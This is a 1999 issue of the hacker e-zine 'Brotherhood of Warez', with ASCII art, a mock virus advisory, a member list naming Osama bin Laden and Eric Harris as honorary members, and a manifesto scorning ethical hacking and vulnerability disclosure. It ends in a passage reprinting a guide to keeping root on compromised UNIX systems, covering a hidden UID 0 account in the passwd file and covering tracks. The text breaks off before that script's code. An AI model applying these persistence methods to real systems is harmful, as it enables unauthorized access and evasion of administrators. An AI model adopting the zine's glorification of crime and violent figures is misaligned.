_______________________________________________________________________________ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= : May / June 1999 * ____ \ / ________ BRoTHeRHooD oF WaReZ : : / | \ __* __ || / ___ \ BRoTHeRHooD oF WaReZ : : The Brotherhood | o / ___| \ / | -++- \____ / BRoTHeRHooD oF WaReZ : : of Warez. Never | \/ \ | | | -++- / / BRoTHeRHooD oF WaReZ : : Afraid, and | o ) o | .o / || /___/ BRoTHeRHooD oF WaReZ : : Always Pheared. |___/\___/ \/\/ NiNE BRoTHeRHooD oF WaReZ : -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= No, you're not hallucinating, it's the: __________ __ .__ .__ .___ \______ \_______ _____/ |_| |__ ___________| |__ ____ ____ __| _/ | | _/\_ __ \/ _ \ __\ | \_/ __ \_ __ \ | \ / _ \ / _ \ / __ | | | \ | | \( <_> ) | | Y \ ___/| | \/ Y ( <_> | <_> ) /_/ | |______ / |__| \____/|__| |___| /\___ >__| |___| /\____/ \____/\____ | \/ \/ \/ \/ \/ _____ __ __ _____/ ____\ / \ / \_____ _______ ____ ________ / _ \ __\ \ \/\/ /\__ \\_ __ \_/ __ \\___ / ( <_> ) | \ / / __ \| | \/\ ___/ / __/ \____/|__| \__/\ / (____ /__| \___ >_____ \ \/ \/ \/ \/ k-RaD pH0r tHe aYch/Pee NaTi0n PURE CHEWING SATISFACTION IN 1999 .,aad88888888888baa,. ,ad8888888888888888888888888ba,. ,ad888888888888888888888888888888888ba, ,ad888888888P""' """Y88888888888ba. ,d88888888P"" ""Y888888888ba a888888888" ""Y88888888b, ,888888888b, psst! Just put up this ""Y8888888b, d888888888888b, k-rad sign at yer local "Y8888888b, ,8888888' "888888b, 2600 m33ting 4r3a "Y8888888b ,888888" "Y88888b, and l3t the narqz kn0w "Y888888b ,888888' "Y88888b, they are not w3lc0m3 4t y0ur "888888b ,888888' "Y88888b, k-sp1ff1e w4r3z sw4p... `888888a ,888888' "Y88888b, `888888, 888888' ooooo ooo 88888b, Y88888b d88888P `888b. `8' `888888, 888888' 8 `88b. 8 .oooo. oooo d8b .ooooo oo oooooooo )88888) 888888 8 `88b. 8 `P )88b `888""8P d88' `888 d'""7d8P (88888) 888888 8 `88b.8 .oP"888 888 888 888 .d8P' d88888) 888888 8 `888 d8( 888 888 888 888 .d8P' .P 888888) 888888 o8o `8 `Y888""8o d888b `V8bod888 d8888888P ,888888' Y88888, ^ 888. d888888 `88888b /|\ 8P' ,888888P 888888 | "Y88888 " d888888' `888888, Insert Fave N4rq Here "Y88888b, d888888P Y888888, "Y88888b, ,d888888P Y88888b, "Y88888b, ,8888888" Y88888b, f1n4lly, a sure-fire w4y to k33p "Y88888b, d8888888" Y888888, und3s1r4bl3z fr0m 1ntrud1ng 4nd "Y888888888888P' "888888b, st34l1ng y0ur z3r0d4y k0d3Zz! "8888888888" Y888888b, ,888888888" Y8888888ba, ,a888888888" "Y88888888ba,._ .,ad888888888P" "Y88888888888bbaa,,______,,aadd88888888888"" "Y8888888888888888888888888888888"" ""Y888888888888888888888P"" """""""""""""" _______________________________________________________________________________ Brotherhood of WaReZz -BoW- Brotherhood of WaReZz -BoW- Brotherhood of WaReZz _______________________________________________________________________________ 9999999999999999999999999999999999999999999999999999999999999999999999999999999 NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE+---------------------------------------+NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE| In this latest K-rad issue of BoW you |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE| can leech the following phresh warez: |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE| 1) K-L33T INTRO TO NUMBER NINE |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE| 2) WHO TO PHEAR (AKA MEMBER LIST) |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE| 3) BOW EMERGENCY RESPONSE TEAM [B3RT] |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE| 4) YOU JUST DON'T GET IT, DO YOU? |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE| 5) GETTIN' SNEAKY WITH BOW |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE| 6) HACKING 10-10-321 |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE| 7) HOW TO BE AN ELiTE HAQR |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE| 8) THE ENTERTAINMENT K0LUMN |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE| 9) AN INTRO TO TH3 B1W FIGHTING FORCE |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE|10) K-RAD CRYPTOGRAPHY |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE|11) PHRESH WAREZ: BOWZ4P.C |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE|12) RHYMIN' AND K0UR13RIN' |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE|13) BOW 0FFICIAL D1STR0 S1TE LISTING |NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE+---------------------------------------+NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE NiNE 9999999999999999999999999999999999999999999999999999999999999999999999999999999 ______________________________________________________________________________ 111111111111111111111111111111111111111111111111111111111111111111111111111111 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| INTRODUCTION TO BOW NUMBER 9 |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: Lister *BoW BoW BoW BoW BoW Bo ============================================================================== Phear ye, phear ye! Just when you thought it was safe to cancel your subscrip- tion to Bugtraq, comes the return of BoW. That's right folks, the people who brought you the ever-pheared .rhosts explo1t and sh0ck3d th3 world with the release of d4l3 dr3w's gerbling photos are back in 1999 with h-bomb force. Here we are on the verge of the new millenium, and now the torch has been passed from Pluvius to myself for editorship of the most pheared newsletter on the face of the planet. We've seen busts (well, duh), h4qr wars, h4tr3d, l0ve, n4rqs, w3dd1ngz, fun3ralz, d1v0rc3, and a degredation of the scene so bad that the only requirement for being called a hacker these days seems to be the ability to breathe. And through it all, the Inner Sanctum of Bow has been watching. Laughing for the most part. Yet here we are, f00tl00se and ph4ncy-phr33, after all that has happened since BoW #8. Have we been to jail? No. Do we 0wn you? Chances are, yes. "Fuck," you might be thinking "these bastards have a pretty inflated ego." Well guess what, we do. But don't forget: EGO = (E)veryone's (G)etting (O)wned This ninth issue of BoW is sure to b3 a real treat. We've got the freshest war3z out there, and I guarantee you you won't find a better sell-by date anywhere else. Just keep in mind that this is my first jab at being editor so you'll have to forgive any mistakes I make along the way. Well, you don't really have to, but I assure you I won't lose any sleep over it. If you think you're k-rad enough for BoW, and you'd like to see your name up in lights, then feel free to submit an article to bow@velkro.net. You can also send any letters, or feedback to that address. If you're particularly paranoid, the new BoW pgp key is available a little further down. We're also always on the lookout for k-kewl ascii artwork to grace the pages of our hallowed journal, so send us yer favorite creation while your at it. Submission does not guarantee publication, but it's worth a try. Well, that about sums things up for this issue. Besides, there's not much else to be said. So, on with the show and get set to enter Phear Nation%&!@#! - 30 - -- Lister [BoW Editor] boweditor@velkro.net PHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARB -**=< BoW Y2K compliance statement >=**- By: Pluvius All versions of BoW starting at version 9.0 are fully Y2K compliant. Unfortunately earlier versions of BoW, specifically version 1, 2, 3, 4, portions of verion 5, all of version 6, 7 and also version 8 are *not* Y2K compliant. It is important to note that all of these versions of BoW were released during or prior to 1994 which is well before the Y2K issue was a known problem (the movie 'Strange Days' didn't even come out until 1995). So we really don't feel it was our responsibility to make sure that these versions were Y2K compliant. Unfortunately, the older versions of BoW will cease to exist when the clock passes midnight, December 31st, 1999. We spent a lot of energy trying to find a work around, but there was none apparent. Our consultants have suggested that we urge readers to set their clocks to Decemeber 31st, 1989 to avoid loss of precious data. -**=< |nfo ma|l Ivan's Y2K checklist >=**- Checkbox TODO Item _ |X| move to rural Montana |X| buy some guns. lots of guns |X| hoard food, water | | get solar powered computer (check on weather in Montana!) |X| stock up on spice girls memorabilia (it will be worth something) |X| get one of those bikes that makes electricity | | buy 1 year supply of twinkies |X| withdraw all money from bank | | get money belt to hold cash - M0r3 t0 c0m3 s00n! PHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARB -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 6.0.2i mQGiBDcugnsRBADB+1mPC917xR6CY/dtlJdfIzqDQ1wSzmjN4nBUmp85bVUl4sDu NVCgRS8wOjTe0YuRU390qsROtOmunc4PyPUvGeiHOOyPW8YJSyrbHVHGfEZFM7Lm PgHeBeQSX0KOVW551fJrUZlp8dkaqQns02IWsYQCTO27Bc54TFC6LI/X3wCg/94l 7JLwtQQuHoW3ZE/5cTk+BwcD/03gtS5vXbnQjm9PSxqcWZB2k9xiCJ2yRg28SoPw tKdlHVK2pMpJZtKf99/IqL3Bl0AXP0Z8eGGUyoSUIcSVhMQlAuMcTiw4NVfZ720R IvjLc4xupetgtFKs0CskhBdsVDIpKXdM6YBkY49isCH1DZSCMNKuRTwZilOQujh0 v4dLA/0fgdtuaFOIvN0vzV9pmNBCqgDFHJzUJeEwj0Ttt8zkr2f59i4sL9cZQL/7 FjT8wQvHLOb07B7XYsSAD8MOeMELjhlxeHdeyMdBPXSMVNw7N8jDNY6jcTBckH8L Zh6S9kE/TZzSn0WZiMKoMg0dRenWc2nQQfTL/1eJ5ID94iN6TrQpVGhlIEJyb3Ro ZXJob29kIG9mIFdhcmV6IDxib3dAdmVsa3JvLm5ldD6JAEsEEBECAAsFAjcugnsE CwMCAQAKCRCGmZ3H+OxTRb69AJsF3L7NLTRFy04/eZn8Ib1OnevYzgCfSBjycfUN 1JoSnaus8cIorF/oM+e5Ag0ENy6CexAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+2 8W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZS Tz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI6 1Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/Cl WxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgH KXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIIAJqg Dfzc20TnslEnZ6SrfT34VFTTFBp5DSLlhcsMntm30aZKxGLWUGKGbcG8viEWNCfU kje4viAKU/A3GzicmokNpRcm2EhmNmta6pFhB1506i8PSL0QA0XymDzZV2hcvDdk fycjQGvJXxs8q4t2sf0+yQdq7q04b5noxtkf51SuYga/ImMHIaGIou+/x2dpbGD2 76mUFtgFRo2mntwNfPDOwJshdIMr5rsj9i4bFZNKgCWOLdtv8uem7dM3oXzpB4+O 8eibRZRA2xTaT1UUI67SCGZsk38A6Q9R2L/qV73+DEBDsqeLptsnKmmwB3POLi29 VCDD7+EvFGA++VxV2CKJAEYEGBECAAYFAjcugnsACgkQhpmdx/jsU0UlxgCfd47N 6T+fTjf+IjiHZFYBlVrgoa0AoMucb+IeBHz0j7sw3GRR4Fm18bOK =Byvb -----END PGP PUBLIC KEY BLOCK----- +++ ATZ OK ATDT*67,1-800-PH34R-B0W CONNECT 666bps v.31337/KRAD BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW + Return of the Mast(head) + BoW Magazine is an electronic magazine published whenever we feel like it, (literally -- it's been five years since we last came out with an issue) specializing in Computer Deviancy, Software Piracy, Computer Insecurity, Telecommunications Fraud, and other nasty things. The longdistance carriers phear us. BoW Magazine is KopyWrong (K) 1999. Any unauthorized distribution is k-lame, and we will get Tsut0mu Sh1m0mur4 t0 track you down, narq you out, hire a bad journalist to help him write a mediocre book about it, wh0re himself to the media, and generally capitalize off your misfortune, if you distribute these electrons without prior consent of God. God can be reached in New York City, on the subway. Grab a ride and ask him... then it will be ok. You can also distribute this magazine in an unauthorized fashion if either a) Eugene Spafford or b) A Real Cyberpunk [in the event you do not know Eugene Spafford] say it's ok. Real Cyberpunks can be reached at the following email addresses: idol@well.sf.ca.us, president@whitehouse.gov, root@att.att.com, and root@microsoft.com. If you don't have access to email, then call up a cyberpunk at the following phone number: 0. Ask them... but first ask them for some k0d3z, it's a secret codeline. Tell them you would like to distribute BoW magazine in an unauthorized fashion. They will be able to give you permission. BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW THERE NEVER WAS ANY CARRIER IN THE FIRST PLACE NuBeR NiNE 1n '99. BoW - Spreading the Zeroday your way since 1992. The BoW Ninth Issue Return of the Hack Comeback Spectakular is (K) KopyWrong __________ __ __ ____ ________ ________ ________ \______ \ ____/ \ / \ /_ / __ \/ __ \/ __ \ | | _// _ \ \/\/ / | \____ /\____ /\____ / | | ( <_> ) / | | / / / / / / |______ /\____/ \__/\ / |___| /____/ /____/ /____/ \/ \/ distribute everywhere The Few, The Pr0ud, Th3 pheared. The BoW. THE BROTHERHOOD OF WAREZ www.velkro.net bow@velkro.net ______________________________________________________________________________ 222222222222222222222222222222222222222222222222222222222222222222222222222222 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| K-SP1FF BOW MEMBER LIST |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: The BoW Staff *BoW BoW BoW BoW BoW Bo ============================================================================== High Epopt and Master Therion: U4EA Newsletter editor: Lister Members: Th3 V3lkr0 K0d3 \/\/aRRi0R, Lister, SW_R, Pluvius, kiad, The Deadkennedy, Ratscabies, D-CeLLeRaTiON TRaUMA The Own3d R4ng3r, Distr0-D4v3, S1l3nt K0ur13r Simply-like-their-name-in-the-Mag-and-never-do-anything: Pluvius (R3v3ng3 1s M1n3!@# M0Hoh4h4@#$!) Missing in Action: Carsenio, Mystic Ruler, Maelstrom K-Rad Web Designer: Th3 V3lkr0 K0d3 \/\/aRRi0R Honourary Members: Cliff Stole, Eugene Sp4fford [PhEaR!@#], Eric Harris, Osama bin Laden Tsut0mu Sh1m0mura Media Wh0r3 Award: The EFF, J0hN Vr4n3s3v1ch, HFG (a three way tie!@$@!@) Will 0rg4sm if he sees his name in BoW, so we'll print it: Wep Lifetime Achievement Award: Pluvius Traxxter Memorial Narq Award: Nick Potkay Auxiliary Members: VOiCE MAiL HaQR, Count Zero-Day, The Cyberspace Warrior, Danny Diveter, *67-Kevin, Aspen Extreme, Peter Packet, Call-return Vern, The 300 baud bandit, Trevor Trunk, Telephone Tony, PBX-Pat, Speaker fone Joan, *70-Hero, TH3 PHR3SH PR1NC3 0F B3LLC0RE, Luke D0wnl04d3r, Blue Box Bart, The Call Block Jock, The MCi Sprinter, Datapac Jack, The Delphi Guy, Compuserve Connie, DiATR1b3, x.25 Clive, HTT Pete, Centagram Sam, NUA Faye, Line Man Stan, Call Display Faye, Kordless Karl, K-r4d Vl4d, x2 Stu, m4rt1n luth3r p1ng, p4p4 SmUrph, Dial Tone Don, Pirate Pete, Conference Call Paul, Hackle-b3rry phin, SunOS Ross, th3 pir8 of p3nz4nc3, Z3r0d4y Want Shen0b1, Coco Cottz, The Code Slayer, D1g1t4l D0pp3lg4nger, W4r3z P00dle, mendax m1ke, |NFo Ma|L iVAN, Three-way Jay, el8 pete, dr0pstat d4le, A0L M3l, d0tc0m T0m, L0u1s Farrahk0d3 Greetz go out to: H4G1S, GLuE, ANuS, Juliet, Yorkshire Posse, W.A.R.E.S. ______________________________________________________________________________ 333333333333333333333333333333333333333333333333333333333333333333333333333333 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| BERT ALERT NUMBER 0NE |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: The Deadkennedy *BoW BoW BoW BoW BoW Bo ============================================================================== BoW Emergency Response Team [BERT]® Adv1s0ry BS-99-04-Melissa-M4cr0-V1rus Or1g1n4l 1s$ue d4t3: Saturday March 27 1999 auth0r: sen10r BoW sekur1ty k0nsult4nt, The Deadkennedy Syst3ms Aff3k-t3d: Mach1nez with Micr0soft Word 97 or Word 2000 Any mail h4ndling syst3m c0uld x-per1ence perf0rmance pr0bl3mz 0r a denial 0f serv1ce as a result 0f the pr0pagay$hun 0f this macro v1ru$. Ovrv13w: @ apr0x1m8ly 4:00 AM EST 0n fr1d4y m4rch 26 1999 w3 b3g4n receiv1ng rep0rt$ 0f a m4cr0 v1ru$ att4Q1ng f41thfUll BoW r34d3r'z w1nd0ws m4ch1n3z. w3 w0k3 up ar0und 2:00 PM EST t0 1nvest1g8, 4t f1r$t w3 susp3ct3d v1r11d c0p1ez 0f n1nj4 g41d3n. th1$ w0uld tuRn 0ut 2 b ph4r fr0m th3 tr00th. th3 re4l1ty 1z ph4r m0r3 s1n1$t3r. sp4f w4$ unav41labl3 ph0r k0mm3nt. 0ur analys1s 0f th1z v1ruS ind1c8z 1t w4$ NOT cre8d w1th VCL! aft3r k0nklud1ng th1$ w3 skr4cth3d 0ur hedz 4 a f3w h0urz. wh4t w3 end3d uP f1gur1ng 0ut w0z th3 v1rus pr0p4g8z du3 t0 hum4n interaksHun (the us3r 0pen1ng a d0cum3nt). d-skrYptshUn: Th3 Mel1ssa m4cr0 v1ru$ propag8s 1n th3 f0rm of an em41l mess4ge k0ntaining an inf3cted Word document as an att4chment. The tr4n$port m3ss4g3 h4Z m0s+ fr3quently b3en rep0rted 2 k0ntane th3 f0llow1ng Subj3ct he4der Subject: 0-d4y w4r3z, op3n th1$ br0 Wh3r3 1z th3 pHull n4m3 of the k0ur13r gr0up s3nd1ng the m3ss4ge. 0r: Subject: u m4y h4v3 alr34dy w0n 10 m1ll10n d0ll4rz dud3! 0r: Subject: eye b3t ur s0 l4m3 u k4nt ev3n f1gur3 0ut h0w t0 re4d th1$ em4il th3 b0dy of the mess4ge 1z a mult1p4rt MIME mess4ge k0nt4in1ng 2 seKshunz. Th3 f1rst seKtion of the mess4ge (Content-Type: text/plain) Kont41nz th3 foll0w1ng t3xt. "th1z 1z th3 m3l1ssa v1ru$..ur 1n 4 1t t0ugh gUy..YP rulez 1n '99" Th3 n3xt seKtion (Content-Type: application/msword) waZ in1ti4lly rep0rted 2 b a doKum3nt kalled "BoW7.doc". Th1s docUm3nt Kont4ins ref3rences to p0rnographic web sitez and 0-d4y k0d3z. th3 m4cr0 th3n ch3x 2 s33 1f th3 reg1stry key "HKEY_Current_User\Software\Microsoft\Office\Melissa?" h4$ a valUe 0f "... H4G1S R0X". 1f 1t d0e$ th3 v1rUs beg1nz 1tz v1c10uz cycl3. 4t f1rst th3 v1rUs app34rz h4rml3$$, h0w3v3r w1th1n 2 h0urz 0f inf3ct10n 1t b3g1nz rm'ing 4ll ur arch1v3d 0-d4y. aft3r rem0v1ng ur w4r3z 1t mut8s 1nt0 a phyz1k4l ph0rm and b3g1nz t0 sl4p u ar0und unt1l u s4y "EyE PHEAR BoW". f1g 1.0 (p1ksur3 0f s3d mut8d v1ru$ du0d): _||||||||||||||||||||||||_ / \ / \_/ \ | \____ _____/ | | / o /\ /\ o \ | | \___/ \___/ | | /\ | \ ______________________ / \_ .____| | | |____. _/ \ |___| |___| / \______________________/ _____| |_____ / \ | | | / __________ \ | |\/\/\| I LUV BOW! |\/\/\| | ~~~~~~~~~~ | | | < > ( b0rn 2 1nf3ct! ) \__________________/ up0n utt3r1ng th3 phr4$3 th3 v1ruS c4lmz d0wn and gr4bz h1ms3lf a b33r 0ut 0f ur fr1dge, and s1tz d0wn at uR k0ns0l3. th3 v1ruS th3n subskr1bez u 2 500 m41l1ng l1stz and p0$tz t0 alt.pictures.erotica.beastiality fr0m ur w0rk/sch00l addr3ss, 1t th3n impregn8z ur g/f w1th th3 dem0n seed 0f BoW. th3 v1ru$ 1z als0 kn0wn t0 thr0w f1tz 0f r4g3 shUd u 0nly h4ve l1ght br3w. b w4r3. 1mp4ct: dud3..d0nt g3t th1Z v1rus..1tz b4d n3wz 4 sur3. s0lut10n: buy 4n am1g4. ______________________________________________________________________________ 444444444444444444444444444444444444444444444444444444444444444444444444444444 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| YOU JUST DON'T GET IT, DO YOU? |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: U4EA *BoW BoW BoW BoW BoW Bo ============================================================================== <----] What is BoW? [----> BoW is a fraternal organization for like minded inviduals. BoW is a virtual sanctuary for the exploration of the so called "darkside" of the "hacker" ethic. BoW serves a twofold purpose, one being of course the artistic interpretation of what is now a stagnated "scene" using the ascii medium (the zine). Secondly BoW serves as an engine of stratification; employed mercilessly by it's high ranking members. <----] How does one become a member? [----> BoW members are born not made, if you truly are BoW material: you will be recognized as such by the governing council and invited to take refuge amongst our membership. Once invited you will be subjected to a series of ordeals, no two members are put through the same test as each individual is recognized as the subjectively encapsulated being that he / she is. The Aeon of BoW began in 1992 when the existing scene paradigm was redefined by my utterance of the word "Phear" and I was recognized to the station of "Phearless Leader" by the existing governing council. This council was born out of the ashes of what once served as the largest H/P organization in the world: VirtualCon. Never heard of it? You either weren't around, or if you were, you were likely a worthless social scene parasite and not actively involved in anything. <----] Why "darkside"? [----> At the time of BoW's inception, the existing hacker "ethic" was riddled with such drug-addled hippy slogans as "information wants to be free", "if ___ is outlawed, only outlaws will have ___", etc. There was an alarming trend towards what the socio-political faction of the "scene" termed "ethical hacking" which if you reduced it to it's base elements you would find it roughly translated to the following: - kiss as much ass as possible as it may one day lead to employment. - turn over every exploit you are either given or discover on your own to security professionals and organizations such as CERT for kudos. - post all exploits, etc to newsgroups such as bugtraq, etc so that you can gain recognition from your peers. (sounds a bit like the warez scene doesn't it?) - when it is politically correct to do so, reprimand other hackers publically for actually hacking / phreaking. - kick / ban anyone from hack / phreak irc channels when they ask a question you cannot either answer or are too ignorant to understand. - support the presence of law enforcement and / or "narqs" at both public conventions or forums on the internet such as irc, etc. - Play word games in order to avoid ever having to make any sort of commitment through individual action. ie: hacking / phreaking. When it is convenient to do so (ie: to impress ur friends) then the ethical hacker is of course a "darkside" hacker openly breaking computer crime laws but of course when one is amongst other "ethical hackers" one has to put on airs to the contrary. - Hide behind your copy of the K&R white book and insist that C programming is an arcane and esoteric skill known only to the few. (*laff*) BoW recognized this for the dangerous paradigm that it was and immediately issued a stern commitment to the anathema of all that the "ethical hacker" stood for. At the same time, a media whore pseudo-journalist by the name of "John Markhoff" , realizing that his poor writing skills and attention defecit disorder would never get him anywhere, sought to further his career by focusing his pen on the antics of Kevin Mitnick. He termed Kevin, a "darkside" hacker in the pages of his book "Cyberpunk" and defined the term with negative connotations. BoW recognized John Markhoff for the trash that he is and decided to reclaim the word that Kevin Mitnick had chosen to martyr himself for. BoW became resonant with the DARKSIDE and continues to evolve the archetype of the darkside hacker to this day... Enter the corporations and the commercialization of our playground... With that came the ISP... And more than likely, with those two events: YOU CAME TO OUR WORLD. Were you on the internet before the ISP was born? If your access were removed tomorrow could you find your way back to our world without purchasing it? Without begging for it? Without having to read a pop up book or text file, could you do it? If the internet completely ceased to exist tomorrow, where would you go? Could you find us again? Do you know the way? Did you answer the question, or are you too busy insisting that you have earned your right to be here? * What is your raeson d'etre? * Are you a genuine seeker or do you merely want to be like us? To get the attention we get without trying? * Are you prepared to go all the way? * When your doors are being kicked down, when your beloved computers and assorted electronic equipment are being indexed and carried out your door by THE MAN are you going to cry? Are you going to turn all your friends in? Friends that trusted you with information about them? Those that you spent your free time posturing in front of, bragging to, telling them that you were the real thing... Will you sell them out because you are a FAKE? Is the freedom of others worth all that? Is *your* freedom worth all that? To trade them both for a few moments of empty posturing? * DID YOU THINK YOU WERE FOR REAL? * _ - - / B \ Y00 + FoUr |+-+-+-+0+-+-+-+| EeE + AhH \ W / - _ - ______________________________________________________________________________ 555555555555555555555555555555555555555555555555555555555555555555555555555555 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| A GUIDE TO BEING SNEAKY |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: Br0th3r M1ch3r0b [YP] *BoW BoW BoW BoW BoW Bo ============================================================================== y0y0y0 f3ll0w aYch-p33'RzZ.. d1s b th' 1 & th' 0nly Br0th3r M1ch3r0b 0f th3 Y0rksh1r3 P0$$3 (ph33r, l4ym0rzZ!@#$). th1z 1z 4 f1l3 k0nt41n1ng sUm v3ry 0-dAy x-pL0itZz and 1npH(), s0 eY3 4m trU$t1ng 1n u BoW r34d1ng el8 du0dz t0 k33p th1z s3krUt t3kn1q 0ut 0f th3 h4ndz 0f l4ym0rz. app3nd3d b3l0w 1z 4 /<-r4d t-ph1l3 th@ 1z v3ry v3ry 'sn34ky' 1n 1tz n4tUr3.. l1k3 eY3 s3d v3ry 0-d4y 1npH(), n0t ph0r pUbl1k d1$tr1bUt10n. w3 0f th3 y0rksh1r3 p0$$3 h4pp3n3d up0n 1t dUr1ng 0ur tr4v3lz 1n cYb3rsp4c3 & d3c1d3d 4ft3r mUch d3b4t3 t0 r3l34s3 1t 1n BoW.. s0 h3r3 u g0, enj0y! daemon9/route of The GUiLD Brings You... UNIX Backdoors Dec 16, 1995 _________________________________________________________________ Ok..... You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight. The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ???? Finally! After seeming endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-user privilege you have worked so hard to achieve....? This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike. From a hacking perspective, it is obvious what good this paper will do you. Admin's can likewise benefit from this paper. Ever wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your system? This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are ways into one. _________________________________________________________________ Beforehand Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc... The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be looking for back doors. _________________________________________________________________ The Overt [1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle... #!/bin/csh # Inserts a UID 0 account into the middle of the passwd file. # There is likely a way to do this in 1/2 a line of AWK or SED. Oh well. # daemon9@netcom.com set 